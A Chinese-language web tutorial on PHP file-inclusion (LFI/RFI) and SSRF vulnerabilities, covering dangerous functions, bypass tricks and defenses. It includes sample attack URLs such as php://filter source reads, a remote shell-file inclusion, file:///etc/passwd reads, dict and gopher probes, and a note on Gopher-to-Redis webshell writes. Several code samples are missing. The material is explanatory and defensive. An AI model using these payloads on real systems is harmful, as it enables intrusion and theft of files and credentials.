展开菜单
首页 精品内容 本月促销 装机必备 Windows macOS软件 IOS软件 Android AI PDF教程 专题
全部分类

当前位置:

首页 > 编程开发 > PHP安全漏洞之文件包含与SSRF攻击全解析

PHP安全漏洞之文件包含与SSRF攻击全解析

前言 在Web安全领域,PHP应用程序的安全问题一直是绕不开的话题。今天咱们就来深入聊聊两种常见的PHP安全漏洞:文件包含漏洞和服务器端请求伪造(SSRF)。无论你是刚入行的开发者,还是已经在安全圈摸爬滚打多年的老手,理解这些漏洞的原理、利用方式以及防御措施,都是基本功里不可或缺的一环。 第一部分:

前言

在Web安全领域,PHP应用程序的安全问题一直是绕不开的话题。今天咱们就来深入聊聊两种常见的PHP安全漏洞:文件包含漏洞和服务器端请求伪造(SSRF)。无论你是刚入行的开发者,还是已经在安全圈摸爬滚打多年的老手,理解这些漏洞的原理、利用方式以及防御措施,都是基本功里不可或缺的一环。

第一部分:文件包含漏洞详解

什么是文件包含漏洞

文件包含漏洞,说白了,就是PHP应用程序里一个常见的“坑”。当开发者使用包含函数引入文件时,如果传入的文件名参数没有经过严格校验,攻击者就能趁机读取敏感文件,甚至执行恶意代码。这就像你家的大门没锁,任何人只要轻轻一推,就能进来翻箱倒柜。

危险函数

PHP中主要有四个文件包含函数,它们就像四个“兵器”,用法相似但各有特点:

  • include()
  • include_once()
  • require()
  • require_once()

文件包含漏洞类型

1. 本地文件包含(LFI)

利用方式千变万化,但核心思路无非以下几种:

  • 直接读取Flag文件——最直接的“拿分”手段
  • 通过PHP伪协议读取源代码——把服务器上的文件内容“扒”出来
  • 写入PHP木马获取webshell——从“读”升级到“写”,掌控服务器

看个示例代码就明白了:

攻击者怎么利用呢?很简单,构造这样的URL:

http://www.example.com/demo1.php?file=flag.php%00

这里用到了空字节截断(PHP 5.3之前版本有效),不过现在更常见的做法是利用伪协议。

2. PHP伪协议利用

PHP伪协议是文件包含漏洞的“万能钥匙”,常用的有这么几个:

file:// 协议:直接读取本地文件

http://www.example.com/index.php?file=file://D:/phpStudy/WWW/flag.txt

php://filter:这个最常用,可以读取文件内容并经过base64编码返回,避免被直接执行

http://example.com/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

php://input:结合POST请求,可以发送任意PHP代码

POST /index.php?file=php://input HTTP/1.1...

3. 远程文件包含(RFI)

比LFI更危险,因为它允许攻击者从远程服务器加载恶意代码。不过要触发它,需要满足两个前提条件:

  • allow_url_fopen = On
  • allow_url_include = On

来看一个典型的有漏洞代码:

攻击者只需要在可控参数里传一个远程地址:

http://www.example.com/demo4.php?param=http://www.xx.com/attacker/PHPshell.txt?

防御措施

说了这么多攻击手法,那怎么防呢?其实核心思路就两个字:校验。具体来说:

1. 白名单验证——只允许包含你明确允许的文件

2. 禁用危险配置:在php.ini里把这两个开关关掉

allow_url_fopen = Offallow_url_include = Off

3. 设置open_basedir——限制PHP能访问的文件目录

4. 严格校验用户输入——永远不要信任用户传来的任何数据

5. 避免动态包含——能用静态路径就别用变量

第二部分:SSRF漏洞深入解析

什么是SSRF?

SSRF(Server-Side Request Forgery,服务器端请求伪造)这个名字听起来有点绕,但原理很简单:攻击者利用服务器作为“跳板”,去访问内网或外网本无法直接访问的资源。举个例子,你有一个服务器,它既能访问外网也能访问内网,攻击者通过控制这个服务器的请求,就能间接获取内网数据。

常见危险函数

很多PHP函数都能发起网络请求,但如果不加限制,它们就成了SSRF的“温床”。

1. file_get_contents()

";    echo $img;}?>

这个函数接收一个URL作为参数,然后直接把内容保存到本地文件。如果攻击者传入内网地址,就能读取内网资源。

2. fsockopen()

fsockopen()可以建立任意TCP连接,如果攻击者能控制host和port,几乎可以访问任何服务。

3. curl_exec()

cURL库是PHP中最强大的网络请求工具,但也是最容易被利用的。攻击者可以通过它访问内网Redis、Memcached等服务,甚至利用Gopher协议发起更复杂的攻击。

SSRF绕过技巧

很多开发者已经知道了SSRF的危害,会在代码里做简单过滤,比如只允许特定域名。但攻击者总有办法绕过——

1. IP编码绕过

可以使用xip.io这样的域名服务,比如:

10.0.0.1.xip.io

或者把IP地址转换成10进制、16进制等格式,让过滤函数认不出来。

2. 协议变换

即使限制只能使用HTTP,攻击者也可以尝试其他协议:

Dict协议:dict://192.168.1.1:8080/test:dict

Gopher协议:gopher://192.168.1.1/gopher

File协议:file:///etc/passwd

3. Gopher协议高级利用

Gopher协议是一个“万能”协议,可以模拟各种TCP服务:

FTP

Telnet

Redis

Memcache

比如,攻击者可以通过Gopher协议向Redis发送命令,写入SSH密钥或webshell:

4. filter_var()绕过

有些开发者用filter_var()来验证URL,但同样可以被绕过:

绕过方法很简单:利用URL解析的差异,比如:

http://example.com/test.php?url=0://192.168.1.1.com:8080;skysec.top:80/

5. 30x跳转绕过

如果代码设置了CURLOPT_FOLLOWLOCATION(跟随重定向),攻击者可以构造一个短网址,把用户请求重定向到内网地址:



防御SSRF的最佳实践

面对这么多花里胡哨的绕过方式,防御其实也有章可循:

  • 限制协议:只允许HTTP和HTTPS,其他协议一律禁用
  • 禁止访问内网IP:在代码里明确禁止请求127.0.0.1、10.x.x.x、172.16.x.x、192.168.x.x等私有地址
  • 设置URL白名单:只允许请求你明确信任的域名
  • 禁用CURLOPT_FOLLOWLOCATION:避免被重定向到恶意地址
  • 使用DNS解析结果校验:先解析域名,再核对IP是否在内网范围内
  • 过滤返回信息:即使请求成功,也要对返回内容做安全检查

结语

文件包含漏洞和SSRF漏洞,虽然看起来风马牛不相及,但本质上都是对用户输入缺乏妥善处理。它们就像Web安全中的“老演员”,每年都会在无数漏洞报告中间出现。作为开发者,理解这些漏洞的原理和利用方式,不是为了“黑”别人,而是为了写出更安全的代码。安全是一个持续的过程,需要我们在每一行代码里都保持警惕——毕竟,最好的防御就是从一开始就避免漏洞。

本文内容来源于网友投稿,如有侵权请联系删除。
作者最新文章
编程开发
相关文章 更多
精品专题 更多
装机必备

正软商城装机必备专区,精选办公、浏览器、安全防护、影音播放、压缩解压、设计创作和系统工具等电脑常用正版软件,帮助用户快速完成新电脑软件配置。

Windows

正软商城Windows软件专区,汇集适用于Windows电脑的办公、设计、安全防护、影音播放、开发工具和系统优化软件,提供软件介绍、系统要求、正版授权及购买下载服务。

macOS软件

正软商城macOS软件专区,精选适用于Mac电脑的办公、设计、影音、效率、开发和系统工具,提供软件功能介绍、macOS兼容版本、正版授权及购买下载服务。

IOS软件

正软商城iOS软件专区,精选适用于iPhone和iPad的办公、学习、影音、设计、效率及AI应用,提供功能介绍、适用设备、系统要求和正版获取方式等信息。

AI

正软商城AI软件专区,汇集AI写作、AI绘画、AI视频、AI办公、AI编程、AI翻译、智能客服和数据分析等人工智能工具,提供功能介绍、适用平台、收费方式及正版购买信息。

Mac软件 更多
photoshop
photoshop

Photoshop 2026 是 Adobe 推出的专业图像处理与视觉设计软件,支持 Windows、macOS 和 iPad 等平台,广泛应用于摄影修图、电商设计、平面海报、数字绘画及视觉合成等创作场景。

Blender
Blender

Blender 是一款免费开源、跨平台的专业 3D 创作软件,集建模、动画、渲染、视频编辑与视觉合成等功能于一体,广泛应用于影视动画、游戏设计和建筑可视化等领域。软件支持 Cycles 物理渲染器与 Eevee 实时渲染引擎,并提供多边形建模、骨骼绑定、物理模拟等专业工具。Blender 兼容 Windows、macOS 和 Linux 系统,安装包轻巧、运行流畅,依托活跃的全球开发者社区持续更新,是从初学者到专业创作者都值得选择的正版 3D 创作工具。

灵活计算器
灵活计算器

灵活计算器是一款笔记式算数应用,支持实时计算、动态关联和云端同步功能。记录、整理和输出之间的过渡会更自然,适合长期写作、做笔记或持续沉淀个人内容。

赤友清理大师
赤友清理大师

赤友清理大师是一款为 Mac 设计的智能清理优化工具,可精准扫描垃圾、大文件、重复文件等,释放磁盘空间。做扫描整理、文字提取和表格转换时,它能把识别后的处理步骤接得更顺,资料录入这类场景会省下不少时间。

极度公式
极度公式

极度公式是一款跨平台专业LaTeX公式识别编辑软件,支持OCR公式识别和多平台编辑。和使用说明,避免使用,享受完整功能与稳定支持。做扫描整理、文字提取和表格转换时,它能把识别后的处理步骤接得更顺,资料录入这类场景会省下不少时间。

图几
图几

图几是一款适用于 macOS 的截图、标注与美化工具,支持离线操作保障隐私。界面整理和高频系统操作被放到一起考虑,桌面或窗口内容一多时,管理起来会更省心。

密码键盘
密码键盘

密码键盘是一款兼具安全性与便捷性的高效密码管理器。日常使用里的持续防护和信息管理会更突出,适合把安全控制放进长期使用流程中的场景。

思源笔记
思源笔记

思源笔记是一款本地笔记软件,提供所见即所得的编辑方式,为长文写作带来顺滑的体验。记录、整理和输出之间的过渡会更自然,适合长期写作、做笔记或持续沉淀个人内容。

Office 365 简体中文
Office 365 简体中文

一款文字处理软件,一种订阅式的跨平台办公软件,基于云平台提供多种服务,通过将 Excel 和 Outlook 等应用与 OneDrive 和 Microsoft Teams 等强大的云服务相结合,Office 365 可让任何人使用任何设备随时随地创建和共享内容。

Mac
WALTR PRO
WALTR PRO

WALTR是一款电脑至iOS文件传输转换工具,操作简单,快速实现文件识别与传送。做扫描整理、文字提取和表格转换时,它能把识别后的处理步骤接得更顺,资料录入这类场景会省下不少时间。

CodeExpander
CodeExpander

CodeExpander 是一款快捷短语输入增强工具,通过键入缩写自动展开为自定义文段,提升工作效率。任务管理和过程控制会更完整,持续下载、批量同步或需要稳定传输流程的场景会更适合它。

Mountain Duck
Mountain Duck

Mountain Duck 是一款能将多个网盘挂载到本地的工具,像本地磁盘一样使用网盘。清理链路的完整性会更好一些,做应用卸载、残留处理和空间整理时,通常能少走很多手动排查步骤。

WINDOWS 更多
3dmax(3ds max)
3dmax(3ds max)

Autodesk 3ds Max 是一款专业的三维建模、动画与渲染软件,广泛应用于建筑可视化、游戏开发、影视动画、广告设计和产品展示等领域。

photoshop
photoshop

Photoshop 2026 是 Adobe 推出的专业图像处理与视觉设计软件,支持 Windows、macOS 和 iPad 等平台,广泛应用于摄影修图、电商设计、平面海报、数字绘画及视觉合成等创作场景。

Blender
Blender

Blender 是一款免费开源、跨平台的专业 3D 创作软件,集建模、动画、渲染、视频编辑与视觉合成等功能于一体,广泛应用于影视动画、游戏设计和建筑可视化等领域。软件支持 Cycles 物理渲染器与 Eevee 实时渲染引擎,并提供多边形建模、骨骼绑定、物理模拟等专业工具。Blender 兼容 Windows、macOS 和 Linux 系统,安装包轻巧、运行流畅,依托活跃的全球开发者社区持续更新,是从初学者到专业创作者都值得选择的正版 3D 创作工具。

Windows 10
Windows 10

Windows 10 是一款微软推出的经典操作系统,拥有硬件兼容性与多任务处理能力。它更偏向把系统状态查看和常用调节动作放在一起,适合需要持续观察和微调设备状态的场景。

极度公式
极度公式

极度公式是一款跨平台专业LaTeX公式识别编辑软件,支持OCR公式识别和多平台编辑。和使用说明,避免使用,享受完整功能与稳定支持。做扫描整理、文字提取和表格转换时,它能把识别后的处理步骤接得更顺,资料录入这类场景会省下不少时间。

密码键盘
密码键盘

密码键盘是一款兼具安全性与便捷性的高效密码管理器。日常使用里的持续防护和信息管理会更突出,适合把安全控制放进长期使用流程中的场景。

思源笔记
思源笔记

思源笔记是一款本地笔记软件,提供所见即所得的编辑方式,为长文写作带来顺滑的体验。记录、整理和输出之间的过渡会更自然,适合长期写作、做笔记或持续沉淀个人内容。

傲梅轻松备份
傲梅轻松备份

傲梅轻松备份是一款专业易用的数据备份软件,为重要数据提供安全保障。日常使用里的持续防护和信息管理会更突出,适合把安全控制放进长期使用流程中的场景。

Office 365 简体中文
Office 365 简体中文

一款文字处理软件,一种订阅式的跨平台办公软件,基于云平台提供多种服务,通过将 Excel 和 Outlook 等应用与 OneDrive 和 Microsoft Teams 等强大的云服务相结合,Office 365 可让任何人使用任何设备随时随地创建和共享内容。

Mac
Wise Folder Hider Pro
Wise Folder Hider Pro

Wise Folder Hider Pro 是一款专业级文件和文件夹隐藏加密软件,为私密数据添加多重保护。高频操作更强调就近处理,浏览、整理和跨目录移动文件时,来回切换和重复点击都会少很多。

WALTR PRO
WALTR PRO

WALTR是一款电脑至iOS文件传输转换工具,操作简单,快速实现文件识别与传送。做扫描整理、文字提取和表格转换时,它能把识别后的处理步骤接得更顺,资料录入这类场景会省下不少时间。

CodeExpander
CodeExpander

CodeExpander 是一款快捷短语输入增强工具,通过键入缩写自动展开为自定义文段,提升工作效率。任务管理和过程控制会更完整,持续下载、批量同步或需要稳定传输流程的场景会更适合它。